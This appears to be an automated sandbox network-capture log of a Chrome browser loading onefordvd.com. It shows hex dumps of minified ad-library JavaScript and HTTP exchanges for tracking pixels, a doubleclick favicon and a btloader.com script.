                                                                          2024-08-29 15:12:16 UTC1390INData Raw: 6d 61 69 6e 22 3a 74 72 75 65 2c 22 5f 77 61 69 74 4f 6e 43 6f 6e 73 65 6e 74 46 6f 72 46 69 72 73 74 50 61 72 74 79 43 6f 6f 6b 69 65 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 45 6e 68 61 6e 63 65 64 54 61 72 67 65 74 69 6e 67 52 73 6f 6e 63 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 4e 6f 6e 62 6c 6f 63 6b 69 6e 67 53 61 73 43 6f 6f 6b 69 65 22 3a 74 72 75 65 7d 2c 6d 64 70 3a 31 38 30 30 30 30 30 2c 73 73 64 6c 3a 22 59 58 42 77 63 33 42 76 64 43 35 6a 62 32 30 73 59 6d 78 76 5a 33 4e 77 62 33 51 75 59 32 39 74 4c 47 4a 79 4c 6d 4e 76 62 53 78 6a 62 79 35 6a 62 32 30 73 59 32 78 76 64 57 52 6d 63 6d 39 75 64 43 35 75 5a 58 51 73 5a 58 55 75 59 32 39 74 4c 47 68 76 63 48 52 76 4c 6d 39 79 5a 79 78 70 62 69 35 75 5a 58 51 73 64 48 4a 68 62 6e 4e 73 59 58
                                                                          Data Ascii: main":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsYX
                                                                          2024-08-29 15:12:16 UTC1390INData Raw: 70 5f 73 79 6d 62 6f 6c 5f 22 2b 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 31 45 39 3e 3e 3e 30 29 2b 22 5f 22 2c 65 3d 30 3b 72 65 74 75 72 6e 20 62 7d 29 3b 0a 71 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 29 72 65 74 75 72 6e 20 61 3b 61 3d 53 79 6d 62 6f 6c 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 22 29 3b 66 6f 72 28 76 61 72 20 62 3d 22 41 72 72 61 79 20 49 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 20 49 6e 74 31 36 41 72 72 61 79 20 55 69 6e 74 31 36 41 72 72 61 79 20 49 6e 74 33 32 41 72 72 61 79 20 55 69 6e 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 36 34 41 72 72 61
                                                                          Data Ascii: p_symbol_"+(Math.random()*1E9>>>0)+"_",e=0;return b});q("Symbol.iterator",function(a){if(a)return a;a=Symbol("Symbol.iterator");for(var b="Array Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array Float32Array Float64Arra
                                                                          2024-08-29 15:12:16 UTC1390INData Raw: 66 28 63 21 3d 22 70 72 6f 74 6f 74 79 70 65 22 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 62 2c 63 29 3b 64 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 63 2c 64 29 7d 65 6c 73 65 20 61 5b 63 5d 3d 62 5b 63 5d 3b 61 2e 70 67 3d 62 2e 70 72 6f 74 6f 74 79 70 65 7d 66 75 6e 63 74 69 6f 6e 20 71 61 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 4e 75 6d 62 65 72 28 74 68 69 73 29 2c 62 3d 5b 5d 2c 63 3d 61 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 62 5b 63 2d 61 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 72 65 74 75 72 6e 20 62 7d 0a 71 28 22 50
                                                                          Data Ascii: f(c!="prototype")if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.pg=b.prototype}function qa(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=arguments[c];return b}q("P
                                                                          2024-08-29 15:12:16 UTC1390INData Raw: 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 74 68 69 73 2e 67 67 28 68 2c 67 29 3a 74 68 69 73 2e 4a 64 28 67 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 59 63 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 74 68 69 73 2e 61 65 28 32 2c 67 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 4a 64 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 74 68 69 73 2e 61 65 28 31 2c 67 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 61 65 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 69 66 28 74 68 69 73 2e 42 21 3d 30 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 73 65 74 74 6c 65 28 22 2b 67 2b 22 2c 20 22 2b 68 2b 22 29 3a 20 50 72 6f 6d 69 73 65 20 61 6c 72 65 61 64 79 20 73 65 74 74 6c 65 64 20 69 6e 20 73 74 61 74 65 22 2b 74 68 69 73 2e 42 29 3b 74 68 69 73 2e 42 3d 67 3b 74
                                                                          Data Ascii: ="function"?this.gg(h,g):this.Jd(g)};b.prototype.Yc=function(g){this.ae(2,g)};b.prototype.Jd=function(g){this.ae(1,g)};b.prototype.ae=function(g,h){if(this.B!=0)throw Error("Cannot settle("+g+", "+h+"): Promise already settled in state"+this.B);this.B=g;t
                                                                          2024-08-29 15:12:16 UTC1390INData Raw: 0a 68 29 7b 66 75 6e 63 74 69 6f 6e 20 6b 28 29 7b 73 77 69 74 63 68 28 6c 2e 42 29 7b 63 61 73 65 20 31 3a 67 28 6c 2e 55 61 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 68 28 6c 2e 55 61 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 45 72 72 6f 72 28 22 55 6e 65 78 70 65 63 74 65 64 20 73 74 61 74 65 3a 20 22 2b 6c 2e 42 29 3b 7d 7d 76 61 72 20 6c 3d 74 68 69 73 3b 74 68 69 73 2e 7a 61 3d 3d 6e 75 6c 6c 3f 66 2e 75 64 28 6b 29 3a 74 68 69 73 2e 7a 61 2e 70 75 73 68 28 6b 29 3b 74 68 69 73 2e 4d 64 3d 21 30 7d 3b 62 2e 72 65 73 6f 6c 76 65 3d 64 3b 62 2e 72 65 6a 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 62 28 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 6b 28 67 29 7d 29 7d 3b 62 2e 72 61 63 65 3d
                                                                          Data Ascii: h){function k(){switch(l.B){case 1:g(l.Ua);break;case 2:h(l.Ua);break;default:throw Error("Unexpected state: "+l.B);}}var l=this;this.za==null?f.ud(k):this.za.push(k);this.Md=!0};b.resolve=d;b.reject=function(g){return new b(function(h,k){k(g)})};b.race=
                                                                          2024-08-29 15:12:16 UTC1390INData Raw: 3d 62 2e 6c 65 6e 67 74 68 3b 65 3e 30 26 26 63 3e 30 3b 29 69 66 28 64 5b 2d 2d 63 5d 21 3d 62 5b 2d 2d 65 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 65 3c 3d 30 7d 7d 29 3b 0a 71 28 22 57 65 61 6b 4d 61 70 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 6b 29 7b 74 68 69 73 2e 4b 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6b 29 7b 6b 3d 75 28 6b 29 3b 66 6f 72 28 76 61 72 20 6c 3b 21 28 6c 3d 6b 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6c 3d 6c 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6c 5b 30 5d 2c 6c 5b 31 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 64 28 6b 29 7b 76 61 72 20 6c 3d 74 79 70 65 6f 66
                                                                          Data Ascii: =b.length;e>0&&c>0;)if(d[--c]!=b[--e])return!1;return e<=0}});q("WeakMap",function(a){function b(k){this.Ka=(h+=Math.random()+1).toString();if(k){k=u(k);for(var l;!(l=k.next()).done;)l=l.value,this.set(l[0],l[1])}}function c(){}function d(k){var l=typeof
                                                                          2024-08-29 15:12:16 UTC1390INData Raw: 3d 6c 2e 6e 65 78 74 2c 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 6b 28 6c 29 7d 3b 6c 3d 6e 75 6c 6c 7d 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 68 2c 6b 29 7b 76 61 72 20 6c 3d 6b 26 26 74 79 70 65 6f 66 20 6b 3b 6c 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 66 2e 68 61 73 28 6b 29 3f 6c 3d 66 2e 67 65 74 28 6b 29 3a 28 6c 3d 22 22 2b 20 2b 2b 67 2c 66 2e 73 65 74 28 6b 2c 6c 29 29 3a 6c 3d 22 70 5f 22 2b 6b 3b 76 61 72 20 6e 3d 68 5b 30 5d 5b 6c 5d 3b 69 66 28 6e 26 26 72 61 28 68 5b 30 5d 2c 6c 29 29 66 6f 72 28 68 3d 30 3b 68 3c 6e 2e 6c 65 6e 67 74 68 3b 68 2b 2b 29 7b 76 61 72 20 70 3d 6e 5b 68 5d 3b 69 66 28 6b 21 3d 3d 6b 26
                                                                          Data Ascii: =l.next,{done:!1,value:k(l)};l=null}return{done:!0,value:void 0}})}function d(h,k){var l=k&&typeof k;l=="object"||l=="function"?f.has(k)?l=f.get(k):(l=""+ ++g,f.set(k,l)):l="p_"+k;var n=h[0][l];if(n&&ra(h[0],l))for(h=0;h<n.length;h++){var p=n[h];if(k!==k&
                                                                          2024-08-29 15:12:16 UTC1390INData Raw: 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 58 3d 62 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 68 29 2e 49 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 28 68 3d 64 28 74 68 69 73 2c 68 29 2e 49 29 26 26 68 2e 76 61 6c 75 65 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 5b 68 2e 6b 65 79 2c 68 2e 76 61 6c 75 65 5d 7d 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79
                                                                          Data Ascii: (){this[0]={};this[1]=this[1].X=b();this.size=0};e.prototype.has=function(h){return!!d(this,h).I};e.prototype.get=function(h){return(h=d(this,h).I)&&h.value};e.prototype.entries=function(){return c(this,function(h){return[h.key,h.value]})};e.prototype.key
                                                                          2024-08-29 15:12:16 UTC1390INData Raw: 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 61 3a 7b 76 61 72 20 64 3d 74 68 69 73 3b 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 64 3d 53 74 72 69 6e 67 28 64 29 29 3b 66 6f 72 28 76 61 72 20 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 30 3b 66 3c 65 3b 66 2b 2b 29 7b 76 61 72 20 67 3d 64 5b 66 5d 3b 69 66 28 62 2e 63 61 6c 6c 28 63 2c 67 2c 66 2c 64 29 29 7b 62 3d 67 3b 62 72 65 61 6b 20 61 7d 7d 62 3d 76 6f 69 64 20 30 7d 72 65 74 75 72 6e 20 62 7d 7d 29 3b 71 28 22 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 5b 5d 2c 64 3b 66 6f 72 28 64 20 69 6e 20 62 29 72 61 28 62 2c 64 29 26 26 63 2e 70
                                                                          Data Ascii: urn a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var e=d.length,f=0;f<e;f++){var g=d[f];if(b.call(c,g,f,d)){b=g;break a}}b=void 0}return b}});q("Object.values",function(a){return a?a:function(b){var c=[],d;for(d in b)ra(b,d)&&c.p


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.553749172.67.69.194434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:17 UTC587OUTGET /px.gif?ch=2 HTTP/1.1
                                                                          Host: ad-delivery.net
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:18 UTC1224INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:18 GMT
                                                                          Content-Type: image/gif
                                                                          Content-Length: 43
                                                                          Connection: close
                                                                          X-GUploader-UploadID: ABPtcPpGQj4M5XWsw0_afNd_e9OGg14LZRJ1uEm-mT1UqcHm2kBDuQd0t4vHO2_h4el5IlQxZBc
                                                                          x-goog-generation: 1620242732037093
                                                                          x-goog-metageneration: 5
                                                                          x-goog-stored-content-encoding: identity
                                                                          x-goog-stored-content-length: 43
                                                                          x-goog-hash: crc32c=cpEfJQ==
                                                                          x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
                                                                          x-goog-storage-class: MULTI_REGIONAL
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
                                                                          Expires: Fri, 30 Aug 2024 15:12:18 GMT
                                                                          Cache-Control: public, max-age=86400
                                                                          Age: 858109
                                                                          Last-Modified: Wed, 05 May 2021 19:25:32 GMT
                                                                          ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                          CF-Cache-Status: HIT
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MUjUAt3V%2FuP7MoyDbnjhPj0Xnu0BmVGvBdK2u04%2BIpRb9zqAxA7u9z0kPNX82yfmfGk29QGcMHf9vhGg8xzz2b2%2BebAZIkeXolr2j1JAa8Voq%2BvLYbwWpjdoSPzzobWidw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8bad7a80c90d4326-EWR
                                                                          2024-08-29 15:12:18 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                          Data Ascii: GIF89a!,L;


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.553750172.67.69.194434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:17 UTC608OUTGET /px.gif?ch=1&e=0.7379176731179411 HTTP/1.1
                                                                          Host: ad-delivery.net
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:18 UTC1222INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:18 GMT
                                                                          Content-Type: image/gif
                                                                          Content-Length: 43
                                                                          Connection: close
                                                                          X-GUploader-UploadID: ABPtcPpGQj4M5XWsw0_afNd_e9OGg14LZRJ1uEm-mT1UqcHm2kBDuQd0t4vHO2_h4el5IlQxZBc
                                                                          x-goog-generation: 1620242732037093
                                                                          x-goog-metageneration: 5
                                                                          x-goog-stored-content-encoding: identity
                                                                          x-goog-stored-content-length: 43
                                                                          x-goog-hash: crc32c=cpEfJQ==
                                                                          x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
                                                                          x-goog-storage-class: MULTI_REGIONAL
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
                                                                          Expires: Fri, 30 Aug 2024 15:12:18 GMT
                                                                          Cache-Control: public, max-age=86400
                                                                          Age: 861940
                                                                          Last-Modified: Wed, 05 May 2021 19:25:32 GMT
                                                                          ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                          CF-Cache-Status: HIT
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IijKi690RbRz0dH5uZ8ivS0Yjt6WoJqVRM73Hwwto3PV60skcfEK7xSn4ruyxGrAeEqTKEmMFOCoWRbTU6XU%2FgcpK%2Fx7UOldWEBAAh8Cosodd%2BncSIuASCbTxYW0xWdxAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8bad7a80b8d6425c-EWR
                                                                          2024-08-29 15:12:18 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                          Data Ascii: GIF89a!,L;


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.553751216.58.206.384434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:18 UTC738OUTGET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1
                                                                          Host: ad.doubleclick.net
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:18 UTC745INHTTP/1.1 200 OK
                                                                          Accept-Ranges: bytes
                                                                          Access-Control-Allow-Origin: *
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="ads-doubleclick-media"
                                                                          Report-To: {"group":"ads-doubleclick-media","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-doubleclick-media"}]}
                                                                          Content-Length: 1078
                                                                          X-Content-Type-Options: nosniff
                                                                          Server: sffe
                                                                          X-XSS-Protection: 0
                                                                          Date: Thu, 29 Aug 2024 13:11:41 GMT
                                                                          Expires: Fri, 30 Aug 2024 13:11:41 GMT
                                                                          Cache-Control: public, max-age=86400
                                                                          Age: 7237
                                                                          Last-Modified: Tue, 08 May 2012 13:08:06 GMT
                                                                          Content-Type: image/x-icon
                                                                          Vary: Accept-Encoding
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2024-08-29 15:12:18 UTC645INData Raw: 00 00 01 00 02 00 10 10 10 00 00 00 00 00 28 01 00 00 26 00 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 4e 01 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 04 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11
                                                                          Data Ascii: (& N(
                                                                          2024-08-29 15:12:18 UTC433INData Raw: 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11 11
                                                                          Data Ascii:


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.553752172.67.41.604434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:18 UTC369OUTGET /tag?o=5097926782615552&upapi=true HTTP/1.1
                                                                          Host: btloader.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:18 UTC445INHTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:18 GMT
                                                                          Content-Type: application/javascript
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=300, must-revalidate, stale-if-error=3600, stale-while-revalidate=300
                                                                          Etag: W/"797aa17e982f10a873a7f98bd2d4edb9"
                                                                          Last-Modified: Thu, 29 Aug 2024 15:09:35 GMT
                                                                          Vary: Origin
                                                                          Via: 1.1 google
                                                                          CF-Cache-Status: HIT
                                                                          Age: 10
                                                                          Server: cloudflare
                                                                          CF-RAY: 8bad7a846b370cb4-EWR
                                                                          2024-08-29 15:12:18 UTC924INData Raw: 37 64 65 33 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 31 2c 73 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 3c 73 3b 6e 2b 2b 29 66 6f 72 28 76 61 72 20 72 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 72 29 26 26 28 65 5b 72 5d 3d 74 5b 72 5d 29 3b 72 65 74 75 72 6e 20 65 7d 2c 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 74 28 65
                                                                          Data Ascii: 7de3!function(){"use strict";var e=function(){return e=Object.assign||function(e){for(var t,n=1,s=arguments.length;n<s;n++)for(var r in t=arguments[n])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e},e.apply(this,arguments)};function t(e
                                                                          2024-08-29 15:12:18 UTC1369INData Raw: 7c 7c 28 28 72 3d 73 2e 72 65 74 75 72 6e 29 26 26 72 2e 63 61 6c 6c 28 73 29 2c 30 29 3a 73 2e 6e 65 78 74 29 26 26 21 28 72 3d 72 2e 63 61 6c 6c 28 73 2c 69 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 72 3b 73 77 69 74 63 68 28 73 3d 30 2c 72 26 26 28 69 3d 5b 32 26 69 5b 30 5d 2c 72 2e 76 61 6c 75 65 5d 29 2c 69 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 72 3d 69 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 6f 2e 6c 61 62 65 6c 2b 2b 2c 7b 76 61 6c 75 65 3a 69 5b 31 5d 2c 64 6f 6e 65 3a 21 31 7d 3b 63 61 73 65 20 35 3a 6f 2e 6c 61 62 65 6c 2b 2b 2c 73 3d 69 5b 31 5d 2c 69 3d 5b 30 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 20 37 3a 69 3d 6f 2e 6f 70 73 2e 70 6f 70 28 29 2c 6f 2e 74 72 79 73 2e 70 6f 70 28 29
                                                                          Data Ascii: ||((r=s.return)&&r.call(s),0):s.next)&&!(r=r.call(s,i[1])).done)return r;switch(s=0,r&&(i=[2&i[0],r.value]),i[0]){case 0:case 1:r=i;break;case 4:return o.label++,{value:i[1],done:!1};case 5:o.label++,s=i[1],i=[0];continue;case 7:i=o.ops.pop(),o.trys.pop()
